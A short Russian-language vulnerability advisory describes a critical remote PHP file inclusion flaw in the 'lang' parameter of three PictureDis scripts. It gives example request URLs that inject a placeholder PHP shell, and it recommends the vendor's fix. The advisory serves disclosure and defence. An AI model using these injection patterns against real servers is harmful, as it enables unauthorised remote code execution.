Программа:
PictureDis Professional 1.33 Build 234
PictureDis Photoalbum 4.82

Опасность: Критическая

Наличие эксплоита: Да

Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "lang" в сценариях thumstbl.php, wpfiles.php и wallpapr.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:
thumstbl.php?lang=[ur phpshell ]
wpfiles.php?lang=[ur phpshell ]
wallpapr.php?lang=[ur phpshell ]

URL производителя: www.picturedis.org

Решение: Установите исправление с сайта производителя.

Источник: СекЛаб